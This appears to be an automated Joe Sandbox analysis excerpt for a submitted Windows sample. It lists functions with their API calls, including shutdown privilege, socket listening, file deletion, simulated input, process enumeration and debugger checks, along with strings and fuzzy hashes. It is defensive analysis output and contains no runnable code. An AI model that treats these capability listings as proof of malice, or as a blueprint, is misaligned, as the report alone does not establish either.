Instruction Fuzzy Hash: A4419F352046119FE311DF19E849B59BBE1FF44329F14C09DE8599B6A2C739EC81CB94

Function 0070E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 007016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0070170D
Part of subcall function 007016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0070173A
Part of subcall function 007016C3: GetLastError.KERNEL32 ref: 0070174A

ExitWindowsEx.USER32(?,00000000), ref: 0070E932

Strings

SeShutdownPrivilege, xrefs: 0070E902
, xrefs: 0070E95C
@, xrefs: 0070E925
, xrefs: 0070E920

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 170e4a273236c69d0c3b918c64ff8ab23184af757cd236027fb452772561c2ca
Instruction ID: 6a7c54a4c9d6d6800e2f802ed8370c50a29c59c69266756b6b6c0230dca4711c
Opcode Fuzzy Hash: 170e4a273236c69d0c3b918c64ff8ab23184af757cd236027fb452772561c2ca
Instruction Fuzzy Hash: 0A01D673620311EBFB5466B49C8ABBB72DCA714751F154F21FC03F21D1D5AD6C408295

Function 00721204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 00721276
WSAGetLastError.WSOCK32 ref: 00721283
bind.WSOCK32(00000000,?,00000010), ref: 007212BA
WSAGetLastError.WSOCK32 ref: 007212C5
closesocket.WSOCK32(00000000), ref: 007212F4
listen.WSOCK32(00000000,00000005), ref: 00721303
WSAGetLastError.WSOCK32 ref: 0072130D
closesocket.WSOCK32(00000000), ref: 0072133C

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: bc04bc5a61fde4b1141c4fe45fb255db6bf67f1c217dd47c54dce022809cdaa9
Instruction ID: 4ccba42980433399728e2d7054b0581ea747717162306dd9ccbe47a85726deb0
Opcode Fuzzy Hash: bc04bc5a61fde4b1141c4fe45fb255db6bf67f1c217dd47c54dce022809cdaa9
Instruction Fuzzy Hash: 8B419231A00110DFD710DF24D498B6ABBE6BF56318F588198E8569F293C779ED81CBE1

Function 006DB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006DB9D4
_free.LIBCMT ref: 006DB9F8
_free.LIBCMT ref: 006DBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00743700), ref: 006DBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0077121C,000000FF,00000000,0000003F,00000000,?,?), ref: 006DBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00771270,000000FF,?,0000003F,00000000,?), ref: 006DBC36
_free.LIBCMT ref: 006DBD4B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 15ac8ccb4121a5c3931db7cd4b0820a51b8e612b78db06c5673b133df5f30674
Instruction ID: 28bf3f34090576106390a5f83318100de19ccc6858a37cf329b0aa4061576a88
Opcode Fuzzy Hash: 15ac8ccb4121a5c3931db7cd4b0820a51b8e612b78db06c5673b133df5f30674
Instruction Fuzzy Hash: 1AC15571E00245EFCB209F688C51BEA7BAAEF45350F1A519FE484DB35AEB308E418758

Function 0070D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2

Part of subcall function 0070E199: GetFileAttributesW.KERNEL32(?,0070CF95), ref: 0070E19A

FindFirstFileW.KERNEL32(?,?), ref: 0070D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0070D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0070D481
FindClose.KERNEL32(00000000), ref: 0070D498
FindClose.KERNEL32(00000000), ref: 0070D4A1

Strings

\*.*, xrefs: 0070D3F2

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: de3592f7ecedccc19fa7872ef1e67ce3f756c0b560d426b2965a57d416257810
Instruction ID: 793ff6efe064ec72033b4acb804380952c8e909574a60aa9fdebf398e7e03d2b
Opcode Fuzzy Hash: de3592f7ecedccc19fa7872ef1e67ce3f756c0b560d426b2965a57d416257810
Instruction Fuzzy Hash: 7B316F710083959BC255FFA4D8518AFB7E9BE92300F448A1DF8D193191EB28AE09CB67

Function 006DE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 006DE645

Strings

1#SNAN, xrefs: 006DF844
1#INF, xrefs: 006DF852
1#QNAN, xrefs: 006DF84B
1#IND, xrefs: 006DF83D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 6c3770fec6e0559c48b96aeb2d928ea9200718a10a10bbc894e9dfbbfc8d253f
Instruction ID: bba3fbb32d3d55527ad7070aaff4de3d56373651a416590b01eacc1d0657ed63
Opcode Fuzzy Hash: 6c3770fec6e0559c48b96aeb2d928ea9200718a10a10bbc894e9dfbbfc8d253f
Instruction Fuzzy Hash: 07C23871E086288BDB65DF289D407EAB7B6EB48304F1441EBD84EE7341E775AE818F40

Function 0071648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007164DC
CoInitialize.OLE32(00000000), ref: 00716639
CoCreateInstance.OLE32(0073FCF8,00000000,00000001,0073FB68,?), ref: 00716650
CoUninitialize.OLE32 ref: 007168D4

Strings

.lnk, xrefs: 007164BA, 00716524, 007165E0

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 033df36a20270cccbd063e3a312083d8aa30a822dcfc255e058f406ae7a79833
Instruction ID: 491dfb617ad6986f4d0a749aa88b1876513d99e144bcf417b9f86581de10c24d
Opcode Fuzzy Hash: 033df36a20270cccbd063e3a312083d8aa30a822dcfc255e058f406ae7a79833
Instruction Fuzzy Hash: 7DD14971508301AFD344EF24C8819ABB7EAFF95704F10496DF5958B2A2EB70ED45CBA2

Function 007222DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 007222E8

Part of subcall function 0071E4EC: GetWindowRect.USER32(?,?), ref: 0071E504

GetDesktopWindow.USER32 ref: 00722312
GetWindowRect.USER32(00000000), ref: 00722319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00722355
GetCursorPos.USER32(?), ref: 00722381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007223DF

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 57c7e97d65b63781457456a6b84cd09b205430c4fb9d9dd7ab00d84aac98eb4b
Instruction ID: fd7a2b360e980787fb60acf02511e7fda63e51ec92b25a1d93f8916eb7834769
Opcode Fuzzy Hash: 57c7e97d65b63781457456a6b84cd09b205430c4fb9d9dd7ab00d84aac98eb4b
Instruction Fuzzy Hash: C031E272504315AFD721DF14D849B5BB7E9FF84310F004A1DF985A7192DB38E909CB96

Function 00719B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00719B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00719C8B

Part of subcall function 00713874: GetInputState.USER32 ref: 007138CB
Part of subcall function 00713874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00713966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00719BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00719C75

Strings

*.*, xrefs: 00719B5D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: fd2ea34f4a88fcf58d31193a6b872b2dff3b3ed5f5a0c5d42423079dd0b18439
Instruction ID: 4a0d27f22a23c9ab24aa3c9d21ca0038bd667658e33744d4e2c0b40b01f7bb54
Opcode Fuzzy Hash: fd2ea34f4a88fcf58d31193a6b872b2dff3b3ed5f5a0c5d42423079dd0b18439
Instruction Fuzzy Hash: 6C41A2719042199FDF55EF68C855AEEBBB9EF05300F204059E905A32D1DB389E85CFA4

Function 006B997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 006B9A4E
GetSysColor.USER32(0000000F), ref: 006B9B23
SetBkColor.GDI32(?,00000000), ref: 006B9B36

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 0ee2cf8d4f7ff404f8c2a7d21d8c74d8118144bda38532993b912e06d662e62b
Instruction ID: 9e4622eddce1af2bc9741760b605c09c36d9c21aee008c8134c24f71fd9a7ba8
Opcode Fuzzy Hash: 0ee2cf8d4f7ff404f8c2a7d21d8c74d8118144bda38532993b912e06d662e62b
Instruction Fuzzy Hash: 9AA117F0118448EEE729AA3C8C99EFB369FDF42340F154119F702D6792CA299D82D776

Function 00721806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0072304E: inet_addr.WSOCK32(?), ref: 0072307A
Part of subcall function 0072304E: _wcslen.LIBCMT ref: 0072309B

socket.WSOCK32(00000002,00000002,00000011), ref: 0072185D
WSAGetLastError.WSOCK32 ref: 00721884
bind.WSOCK32(00000000,?,00000010), ref: 007218DB
WSAGetLastError.WSOCK32 ref: 007218E6
closesocket.WSOCK32(00000000), ref: 00721915

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 18012652593e9850eba5903c06e712f3a93cd8ba419a13d95dc64093105d3c1b
Instruction ID: 9fa1c8e9333f4dc4842860c6037e8627a55bc8e01ef0a4525272747a73bfc9e1
Opcode Fuzzy Hash: 18012652593e9850eba5903c06e712f3a93cd8ba419a13d95dc64093105d3c1b
Instruction Fuzzy Hash: 8051C371A00210AFEB10AF24D886F6A77E6AF45718F48805CF949AF3C3C775ED418BA5

Function 006A8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 006A813C
VUUU, xrefs: 006A843C
VUUU, xrefs: 006A83FA
VUUU, xrefs: 006A83E8
VUUU, xrefs: 006E5DF0

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 03a0519ed3f9dfa5ff92a11d4200ebabee6bfb15873f2cca51dce15ec8cf365e
Instruction ID: 06b8b75304216b54d4e2a70e59847dd219a725b5e747d5b63e94db691bc4545a
Opcode Fuzzy Hash: 03a0519ed3f9dfa5ff92a11d4200ebabee6bfb15873f2cca51dce15ec8cf365e
Instruction Fuzzy Hash: 0BA26A70E0125ACFDF24DF59C8507EDB7B2BB55314F2481AAE816A7385EB709E818F90

Function 00708298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 007082AA

Strings

|, xrefs: 007082DA
tbv, xrefs: 007084F4
(, xrefs: 007082F0

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: lstrlen
String ID: ($tbv$|
API String ID: 1659193697-2555993713
Opcode ID: 7fe73acc6c199465cbaefbcc5c59b19ada97fe7675a49150cb442c4d614a6aa6
Instruction ID: caa3681f2b34da061c2418641e246ada119f36e72eee85b3ca5486000c0b7b37
Opcode Fuzzy Hash: 7fe73acc6c199465cbaefbcc5c59b19ada97fe7675a49150cb442c4d614a6aa6
Instruction Fuzzy Hash: 0C323474A00605DFCB68CF59C481A6AB7F0FF48710B15866EE49ADB3A1EB74E981CB44

Function 0072A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0072A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0072A6BA

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0072A79C
CloseHandle.KERNEL32(00000000), ref: 0072A7AB

Part of subcall function 006BCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,006E3303,?), ref: 006BCE8A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 2b30a008a829b119eb839f6f1e364df858fd906de108b2cfce406f65a6a0ba45
Instruction ID: 89e1cef35de5ee43a98196cbcd2d826a504d29f405810b70188a0b05af8b738d
Opcode Fuzzy Hash: 2b30a008a829b119eb839f6f1e364df858fd906de108b2cfce406f65a6a0ba45
Instruction Fuzzy Hash: 1B5169B1508310AFD350EF24D886A6BBBE9FF89754F00892DF58997251EB34D904CBA6

Function 0070AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0070AAAC
SetKeyboardState.USER32(00000080), ref: 0070AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0070AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0070AB88

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f9366f6474de9c52feb160dcf0b84914c9f4cf1557d65b8f56c127088192d660
Instruction ID: 2a7aa1cd79dff489cca7e8fef215b72bb1f7b3894cb037489048bd9a19bd74df
Opcode Fuzzy Hash: f9366f6474de9c52feb160dcf0b84914c9f4cf1557d65b8f56c127088192d660
Instruction Fuzzy Hash: 8E31E3B1A40358FEFF358A68CC09BFA7BEAAB44310F04831AE585965D1D37D8981C766

Function 0071CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0071CE89
GetLastError.KERNEL32(?,00000000), ref: 0071CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0071CEFE

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: a2e47827b108a0cc31558d3e39c6743061628627ca4b7df3ffe6e56d124f7c23
Instruction ID: 4a5b515f33e8cae49efa8089e5245ae33c40f08e582d6e4ed54de5c17234f069
Opcode Fuzzy Hash: a2e47827b108a0cc31558d3e39c6743061628627ca4b7df3ffe6e56d124f7c23
Instruction Fuzzy Hash: 5721C1B25403059BE732CFA9C949BA7B7FDEB00314F10841EE546E2191E778EE898B94

Function 006D2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 006D271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006D2724
UnhandledExceptionFilter.KERNEL32(?), ref: 006D2731

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 360ede8d9f591d8de36dc7886c70b6a16014ae8f4667c6816fe02721d1dc1067
Instruction ID: 82129e98ceb914254db507af9767c37e66a9ef1b6a7019d6d33ef44b6f064c79
Opcode Fuzzy Hash: 360ede8d9f591d8de36dc7886c70b6a16014ae8f4667c6816fe02721d1dc1067
Instruction Fuzzy Hash: 5631C475901219ABCB61DF64DC88BD9BBB9EF18310F5041EAE81CA7261E7349F818F49

Function 007151CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007151DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00715238
SetErrorMode.KERNEL32(00000000), ref: 007152A1

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 425ebe74e7c0049e3e75ad3c89df0288cc21452a36fc839be6be507261a8a33d
Instruction ID: 6c2f15cdca38c03f3aeb3e2ec927e73b73a19bae3730dfee2146c717a21ebcb1
Opcode Fuzzy Hash: 425ebe74e7c0049e3e75ad3c89df0288cc21452a36fc839be6be507261a8a33d
Instruction Fuzzy Hash: C4314C75A00618DFDB00EF54D884EADBBB5FF49314F088099E805AB3A2DB35EC55CBA4

